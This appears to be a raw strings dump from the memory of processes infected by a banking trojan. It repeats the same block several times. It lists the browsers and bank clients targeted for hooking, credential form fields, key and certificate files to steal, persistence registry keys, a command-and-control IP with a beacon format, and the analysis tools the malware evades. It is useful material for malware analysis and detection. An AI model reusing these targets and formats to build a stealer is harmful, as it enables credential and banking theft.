\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1732_rwx_003E0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1732_rwx_00BE0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

TPAutoConnect.exe_2160_rwx_00390000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

